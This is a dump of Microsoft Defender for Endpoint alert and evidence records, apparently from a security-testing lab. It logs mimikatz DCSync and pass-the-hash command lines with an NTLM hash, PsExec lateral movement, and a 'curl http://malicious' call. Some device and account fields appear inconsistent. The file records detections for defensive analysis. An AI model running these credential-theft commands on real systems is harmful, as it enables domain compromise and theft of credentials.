"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "9650845ba0de0cbce1d44db58a253ffa621566f6",
"sha256": "b6d13138adcc4b856c9e7f427012bcce2e822a0228ca00fe13fd14eb56033483",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-21T02:07:44.2966667Z",
"fileName": "Step3-PasstheHash.txt",
"filePath": "C:\\M365DAttack",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "c1498304ddd6c56d400ff57968461965b3ed6f1e",
"sha256": "88240a1cc1291ad715bf3e01ff30768dfcb1e02b533b5994fa4d499b5586495a",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-21T02:13:44.0666667Z",
"fileName": "Step3-PasstheHash.txt",
"filePath": "C:\\M365DAttack",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "b91543d03d57c9456b8e6627e961e7a25d8a9679",
"sha256": "70f30ebc98a554881b463f188a2cf923e400c1e013c64d6c9860db54dad8240d",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-21T02:15:28.18Z",
"fileName": "Step3-PasstheHash.txt",
"filePath": "C:\\M365DAttack",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "a1960eafdd9540f3d4b980e76d6aad61b865ecfb",
"sha256": "3119cc366bdb440d0795341b1fabdc011340a3bce851e347ac71a142d26b6404",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-21T02:17:47.05Z",
"fileName": "Step3-PasstheHash.txt",
"filePath": "C:\\M365DAttack",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "295baa9f28f80b0e31c182657614cf9c4af3f0d3",
"sha256": "624ab25778f3b4c206010b9da358c2df7f3128d33a42f638573c443fd87d7809",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-21T02:23:43.26Z",
"fileName": "Step3-PasstheHash.txt",
"filePath": "C:\\M365DAttack",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "6b05609c1ae73d461a2cae4e9a64475f2a463642",
"sha256": "004b096f3b4063413b00160f582fd1482f8b4c997916c00ecce9339f198c3ec5",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-21T02:25:43.7066667Z",
"fileName": "Step3-PasstheHash.txt",
"filePath": "C:\\M365DAttack",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "dd971e68715b265151d1e4cbb93d2d6a384cdff0",
"sha256": "8713f35cac35db62898200d437b8bb2ec31a4a69f374948ca6132373d6187f47",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-21T02:32:40.24Z",
"fileName": "Step3-PasstheHash.txt",
"filePath": "C:\\M365DAttack",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "0053468d897be6b89b5fb4c27fe71d61b3a9d58d",
"sha256": "25691340c754cab41ff6cce4652a60a2208b3f930693cd1b03565f0f86da7bcd",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-21T02:34:51.05Z",
"fileName": "Step3-PasstheHash.txt",
"filePath": "C:\\M365DAttack",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "eb08b3ba44d70df71be619ce6c72c99e86ae6df8",
"sha256": "2fa7a76b98a049e8729c5da7acab2cb92ee776d048857bdbc91bf03ff5ca3fcb",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638001152862062382_1044475447 | f46a9913-3194-4f03-be39-205b334cf5e0 | 486 | MicrosoftDefenderForEndpoint | 2022-09-30T06:14:46.2062682Z | 2022-11-19T01:35:42.7033333Z | 2022-10-01T01:36:00.5066667Z | 2022-09-30T06:13:06.695814Z | 2022-09-30T06:13:06.695814Z | Malicious credential theft tool execution detected | A known credential theft tool execution command line was detected.
Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more. | CredentialAccess | Resolved | High | null | UnsupportedAlertType | TruePositive | SecurityTesting | WindowsDefenderAtp | f5d3c5d8-ec3a-4412-ab45-934d8faff42c | msftadmin@msdxv2.m365dpoc.com | null | null | [
"T1003"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "malicious.io",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "High",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] | [
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-09-30T06:14:46.24Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Url",
"evidenceCreationTime": "2022-09-30T06:14:46.24Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": "msdxv2-dc.msdxv2.m365dpoc.com",
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Ip",
"evidenceCreationTime": "2022-09-30T06:14:46.24Z",
"fileName": null,
"filePath": null,
"ipAddress": "10.0.0.10",
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-09-30T06:14:46.24Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-09-30T06:11:13.210308Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 4064,
"processCommandLine": "\"mimikatz.exe\" \"lsadump::dcsync /domain:msdxv2.m365dpoc.com /user:krbtgt\" exit",
"processCreationTime": "2022-09-30T06:13:06.6052353Z",
"processId": 6464,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-14T10:48:32.7466667Z | Unknown | None | darol | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638060594559668623_1450940669 | c1ca76d2-397e-428d-9edf-300936c126d4 | 794 | MicrosoftDefenderForEndpoint | 2022-12-08T01:24:15.9668895Z | 2022-12-08T01:37:06.9Z | null | 2022-12-08T01:12:10.8397945Z | 2022-12-08T01:12:10.8397945Z | 'Donoff' malware was prevented | Malware and unwanted software are undesirable applications that perform annoying, disruptive, or harmful actions on affected machines. Some of these undesirable applications can replicate and spread from one machine to another. Others are able to receive commands from remote attackers and perform activities associated with cyber attacks.
This detection might indicate that the malware was stopped from delivering its payload. However, it is prudent to check the machine for signs of infection. | Malware | New | Informational | 56 | PartiallyRemediated | null | null | WindowsDefenderAv | d60f5b90-ecd8-4d77-8186-a801597ec762 | null | null | Donoff | [] | [
{
"aadDeviceId": null,
"defenderAvStatus": "NotUpdated",
"deviceDnsName": "prod.env",
"firstSeen": "2022-12-08T01:04:21.9057174Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15",
"onboardingStatus": "Onboarded",
"osBuild": 19043,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "Medium",
"tags": [],
"version": "21H1",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV8/providers/Microsoft.Compute/virtualMachines/MSDXV8-Win10B",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "97e5e58b-3d5e-4bfe-8e40-a88b49deff08"
}
}
] | [
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Prevented",
"deviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-12-08T01:24:16.0866667Z",
"fileName": "TestFile_OfficeChildProcess_D4F940AB-401B-4EFC-AADC-AD5F3C50688A.docm",
"filePath": "C:\\M365DPoCLab\\Simulation Files\\Attack Surface Reduction\\Block Office applications from creating child processes",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Prevented",
"remediationStatusDetails": "Entity was pre-remediated by Windows Defender",
"sha1": "7bb22f50157cf267281a81918540f4aed4e0b0e1",
"sha256": "f5ec6a746f5d70212a8779e33722964c9ede5c23b3e171cd01e68b1a6c954e86",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Malicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-11T08:20:15.89Z | Suspicious | None | alice | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-11T08:18:14.6166667Z | Suspicious | None | jeff | prod.env | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-12T09:10:20.9033333Z | Suspicious | None | darol | internal.corp | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-21T02:04:35.09Z | Unknown | None | ronhd | MSDXV2 | S-1-5-21-2300221942-1987151257-321556088-1111 | 89b6fc86-af84-47b2-a72d-325362598b2c | ronhd@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638043440642437868_-610099889 | e43d8a36-49ea-4c83-8ca8-1cc8f9c3796d | 741 | MicrosoftDefenderForEndpoint | 2022-11-18T04:54:24.2438047Z | 2022-11-19T01:35:46.6533333Z | 2022-11-19T01:35:46.5533333Z | 2022-11-18T04:37:10.8013687Z | 2022-11-18T04:48:53.9601178Z | PsExec launched a command on a remote device | PsExec was used to launch a command on a remote device. PsExec is a tool used to launch programs on remote, or local devices. An attacker might be leveraging this tool to launch malicious commands to a remote device and move laterally in the organization. | LateralMovement | Resolved | Medium | null | UnsupportedAlertType | TruePositive | SecurityTesting | WindowsDefenderAtp | 40eca4c4-8854-418a-8024-fff7c9d7b077 | takeshi@msdxv2.m365dpoc.com | null | null | [
"T1021",
"T1021.002",
"T1569.002"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "NotSupported",
"deviceDnsName": "tmtower-book",
"firstSeen": "2022-10-10T06:18:04.255Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "Takeshi",
"domainName": "TMTOWER-BOOK"
}
],
"mdatpDeviceId": "83b06aa80899050e5d4132992e36b5b8f14b64e9",
"onboardingStatus": "Onboarded",
"osBuild": 22621,
"osPlatform": "Windows11",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "None",
"tags": [],
"version": "22H2",
"vmMetadata": null
}
] | [
{
"aadUserId": null,
"accountName": "Takeshi",
"detectionStatus": null,
"deviceId": null,
"domainName": "TMTOWER-BOOK",
"entityType": "User",
"evidenceCreationTime": "2022-11-18T04:54:24.2666667Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-21-7316772-2057538409-3008203053-1001",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-22T08:59:19.0966667Z | Suspicious | None | alice | MSDXV8 | S-1-5-21-2159906967-4174806019-1002223092-1104 | null | jeff@msdxv8.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-14T10:46:44.71Z | Benign | None | darol | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-21T02:04:35.09Z | Unknown | None | SYSTEM | NT AUTHORITY | S-1-5-18 | null | null | f309b61a8b005b5ce0a3fb58caaa798cfc95f5db | 3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748 | PSEXESVC.exe | C:\Windows | 5,760 | PSEXESVC.exe | 2022-11-21T02:02:27.7361869Z | 620 | 2022-11-16T03:32:19.0279725Z | services.exe | C:\Windows\System32 | Detected | 36150b3c1b69b5c2da9df4efd86ac6c166924a48 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-14T07:43:55.33Z | Suspicious | None | bob | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2023-01-24T05:33:37.4166667Z | Suspicious | Active | User1 | DIYTESTMACHINE | S-1-5-21-4215714199-1288013905-3478400915-1002 | null | null | f43d9bb316e30ae1a3494ac5b0624f6bea1bf054 | 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | 9,672 | copy con test.txt | 2023-01-24T05:31:04.2740186Z | 8,964 | 2023-01-24T05:31:04.0743902Z | cmd.exe | C:\Windows\System32 | Detected | 302293d9f276eae65553e5042156bce93cbc7148 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-09-30T06:20:01.6733333Z | Suspicious | None | alice | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-19T02:14:40.4166667Z | Unknown | None | jeff | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-21T02:04:36.8866667Z | Suspicious | Active | SYSTEM | NT AUTHORITY | S-1-5-18 | null | null | f309b61a8b005b5ce0a3fb58caaa798cfc95f5db | 3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748 | PSEXESVC.exe | C:\Windows | 5,760 | whoami /all | 2022-11-21T02:02:27.7361869Z | 620 | 2022-11-16T03:32:19.0279725Z | services.exe | C:\Windows\System32 | Detected | 36150b3c1b69b5c2da9df4efd86ac6c166924a48 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-12-22T08:51:30.1466667Z | Suspicious | None | jeff | MSDXV8 | S-1-5-21-2159906967-4174806019-1002223092-1104 | null | jeff@msdxv8.m365dpoc.com | 56d2d9f6c4b44cfedcf71a86ed68cd859e5c692d | 8c75757111b8bc8bd0730fabe3c99f73f08169dfd54ed6a64dcf983dc53fec4b | explorer.exe | C:\Windows | 1,896 | cmd.exe /c whoami | 2022-12-22T08:26:24.0772409Z | 2,796 | 2022-12-22T08:26:23.9030784Z | userinit.exe | C:\Windows\System32 | Detected | 7ba8aa008687dd62d639cb45b52c7c9f971c65c1 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-22T08:48:46.78Z | Suspicious | None | analyst | MSDXV8 | S-1-5-21-2159906967-4174806019-1002223092-1104 | null | jeff@msdxv8.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-18T04:44:34.4Z | Suspicious | None | analyst | TMTOWER-BOOK | S-1-5-21-7316772-2057538409-3008203053-1001 | null | null | 70df765f554ed7392200422c18776b8992c09231 | 912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9 | mimikatz.exe | C:\M365DAttack\Mimikatz\x64 | 17,708 | "mimikatz.exe" privilege::debug "sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:WORKGROUP /run:\"powershell.exe C:\M365DAttack\Get-KRBTicket.ps1\"" exit -Wait | 2022-11-18T04:38:53.2409808Z | 14,616 | 2022-11-14T04:36:16.5242809Z | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | Detected | 83b06aa80899050e5d4132992e36b5b8f14b64e9 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-09-30T06:14:46.2833333Z | Suspicious | None | jeff | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | 70df765f554ed7392200422c18776b8992c09231 | 912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9 | mimikatz.exe | C:\M365DAttack\Mimikatz\x64 | 7,288 | curl http://malicious | 2022-09-30T06:11:59.3259132Z | 4,064 | 2022-09-30T06:11:13.210308Z | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | Detected | c7e147cb0eb3534a4dcea5acb8e61c933713b145 |
da638001152308827480_-286400086 | 636277db-9b37-411e-b2de-ba2a60f61c07 | 486 | MicrosoftDefenderForEndpoint | 2022-09-30T06:13:50.8827674Z | 2022-11-19T01:35:42.7033333Z | 2022-10-01T01:36:00.5066667Z | 2022-09-30T06:13:08.3651044Z | 2022-09-30T06:13:08.3651044Z | Malicious credential theft tool execution detected | A known credential theft tool execution command line was detected.
Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more. | CredentialAccess | Resolved | High | null | UnsupportedAlertType | TruePositive | SecurityTesting | WindowsDefenderAtp | f5d3c5d8-ec3a-4412-ab45-934d8faff42c | msftadmin@msdxv2.m365dpoc.com | null | null | [
"T1003"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "vpn.zone",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "High",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] | [
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-09-30T06:13:50.9266667Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-09-30T06:13:50.9266667Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-09-30T06:11:13.210308Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": null,
"parentProcessId": 4064,
"processCommandLine": "\"mimikatz.exe\" \"lsadump::dcsync /domain:msdxv2.m365dpoc.com /user:krbtgt\" exit",
"processCreationTime": "2022-09-30T06:13:06.6052353Z",
"processId": 6464,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
